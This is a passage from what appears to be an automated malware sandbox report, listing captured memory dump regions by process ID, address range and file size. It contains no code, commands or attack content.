                                                                                                            52KB

                                                                                                          • memory/4392-229-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4432-355-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4464-265-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4468-331-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4488-266-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4488-272-0x0000000003F36000-0x0000000004037000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/4488-273-0x0000000004040000-0x000000000409C000-memory.dmp
                                                                                                            Filesize

                                                                                                            368KB

                                                                                                          • memory/4536-267-0x00000001402CA898-mapping.dmp
                                                                                                          • memory/4536-276-0x00000228C5D90000-0x00000228C5DA4000-memory.dmp
                                                                                                            Filesize

                                                                                                            80KB

                                                                                                          • memory/4536-277-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.0MB

                                                                                                          • memory/4536-264-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                            Filesize

                                                                                                            7.0MB

                                                                                                          • memory/4636-366-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4852-341-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5016-259-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5036-253-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5068-290-0x00000000005C0000-0x000000000070A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.3MB

                                                                                                          • memory/5068-245-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5084-343-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5128-357-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5128-361-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5136-335-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5276-296-0x0000000000401480-mapping.dmp
                                                                                                          • memory/5276-294-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                            Filesize

                                                                                                            284KB

                                                                                                          • memory/5344-346-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5360-299-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5436-330-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5440-348-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5440-351-0x0000000007080000-0x0000000007081000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5480-334-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5536-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5568-305-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5636-354-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5648-310-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5668-311-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5712-364-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5816-352-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/5828-339-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5868-314-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5892-315-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5896-347-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5948-368-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6032-344-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6100-318-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6116-345-0x0000000000000000-mapping.dmp